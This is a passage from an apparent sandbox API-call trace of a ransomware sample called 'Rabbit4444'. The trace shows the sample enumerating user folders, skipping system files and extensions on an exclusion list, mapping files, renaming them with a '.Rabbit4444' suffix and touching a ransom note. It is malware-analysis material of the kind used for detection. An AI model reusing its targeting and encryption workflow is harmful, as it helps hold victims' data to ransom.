lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N" [0068.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0068.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0068.626] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N" [0068.626] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\" [0068.626] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\.BFC0E91B00AE8A0620D3" [0068.626] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\bdshwv0n\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.627] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.630] FlushFileBuffers (hFile=0x228) returned 1 [0068.630] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.630] CloseHandle (hObject=0x228) returned 1 [0068.631] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N") returned 127 [0068.631] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc87147, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf23a64a9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0068.631] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.631] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.631] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.631] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.631] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc87147, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf23a64a9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.631] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.631] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.631] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.631] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.631] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.631] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf23a64a9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf23a64a9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf23a64a9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.631] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.631] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.632] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc87147, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc87147, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf569836, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="microsoft.windows[1].xml", cAlternateFileName="MICROS~1.XML")) returned 1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="Rabbit4444.exe") returned -1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2=".") returned 1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="..") returned 1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="windows") returned -1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="bootmgr") returned 1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="pagefile.sys") returned -1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="boot") returned 1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="ids.txt") returned 1 [0068.632] lstrcmpiW (lpString1="microsoft.windows[1].xml", lpString2="NTUSER.DAT") returned -1 [0068.632] lstrcpyW (in: lpString1=0x130ec38, lpString2="microsoft.windows[1].xml" | out: lpString1="microsoft.windows[1].xml") returned="microsoft.windows[1].xml" [0068.632] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\microsoft.windows[1].xml", dwFileAttributes=0x2000) returned 1 [0068.632] lstrlenW (lpString="microsoft.windows[1].xml") returned 24 [0068.632] lstrlenW (lpString="Rabbit4444") returned 10 [0068.632] lstrcmpiW (lpString1="ows[1].xml", lpString2="Rabbit4444") returned -1 [0068.632] lstrlenW (lpString=".dll") returned 4 [0068.632] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0068.632] lstrlenW (lpString=".lnk") returned 4 [0068.632] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0068.632] lstrlenW (lpString=".ini") returned 4 [0068.632] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0068.632] lstrlenW (lpString=".sys") returned 4 [0068.632] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0068.632] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\microsoft.windows[1].xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\bdshwv0n\\microsoft.windows[1].xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.633] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.633] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15994356522) returned 1 [0068.633] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=716) returned 1 [0068.633] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.633] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0068.633] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5d0, lpName=0x0) returned 0x29c [0068.634] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d0) returned 0x70000 [0068.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11da10 [0068.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0068.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0068.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0068.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.635] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15994614023) returned 1 [0068.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.635] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0068.635] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.636] CloseHandle (hObject=0x29c) returned 1 [0068.636] CloseHandle (hObject=0x280) returned 1 [0068.636] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\microsoft.windows[1].xml.Rabbit4444") returned 163 [0068.636] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\microsoft.windows[1].xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\bdshwv0n\\microsoft.windows[1].xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\microsoft.windows[1].xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\bdshwv0n\\microsoft.windows[1].xml.rabbit4444"), dwFlags=0x1) returned 1 [0068.637] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc87147, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc87147, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf569836, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="microsoft.windows[1].xml", cAlternateFileName="MICROS~1.XML")) returned 0 [0068.637] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0068.637] lstrcpyW (in: lpString1=0x130ec38, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.637] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\BDSHWV0N\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\bdshwv0n\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.639] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.639] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.639] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.639] CloseHandle (hObject=0x280) returned 1 [0068.639] CloseHandle (hObject=0x228) returned 1 [0068.639] GetCurrentThreadId () returned 0xd98 [0068.639] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0068.640] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE" [0068.640] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2f0 | out: hHeap=0xe0000) returned 1 [0068.640] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0068.640] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE" [0068.640] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\" [0068.640] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\.BFC0E91B00AE8A0620D3" [0068.640] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\91pwxike\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.645] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.648] FlushFileBuffers (hFile=0x228) returned 1 [0068.648] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.649] CloseHandle (hObject=0x228) returned 1 [0068.649] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE") returned 127 [0068.649] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.649] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf23cc6fa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0068.649] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.649] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.650] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.650] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.650] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf23cc6fa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.650] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.650] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.650] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.650] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.650] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.650] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf23cc6fa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf23cc6fa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf23cc6fa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.650] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.650] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.650] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x68c64a0c, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.bing[1].xml", cAlternateFileName="WWWBIN~1.XML")) returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="Rabbit4444.exe") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2=".") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="..") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="windows") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="bootmgr") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="pagefile.sys") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="boot") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="ids.txt") returned 1 [0068.650] lstrcmpiW (lpString1="www.bing[1].xml", lpString2="NTUSER.DAT") returned 1 [0068.650] lstrcpyW (in: lpString1=0x130ec38, lpString2="www.bing[1].xml" | out: lpString1="www.bing[1].xml") returned="www.bing[1].xml" [0068.650] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\www.bing[1].xml", dwFileAttributes=0x2000) returned 1 [0068.651] lstrlenW (lpString="www.bing[1].xml") returned 15 [0068.651] lstrlenW (lpString="Rabbit4444") returned 10 [0068.651] lstrcmpiW (lpString1="ing[1].xml", lpString2="Rabbit4444") returned -1 [0068.651] lstrlenW (lpString=".dll") returned 4 [0068.651] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0068.651] lstrlenW (lpString=".lnk") returned 4 [0068.651] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0068.651] lstrlenW (lpString=".ini") returned 4 [0068.651] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0068.651] lstrlenW (lpString=".sys") returned 4 [0068.651] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0068.651] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\www.bing[1].xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\91pwxike\\www.bing[1].xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.651] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.651] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15996225299) returned 1 [0068.652] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=325) returned 1 [0068.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0068.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0068.652] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x29c [0068.653] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x70000 [0068.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2f0 [0068.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 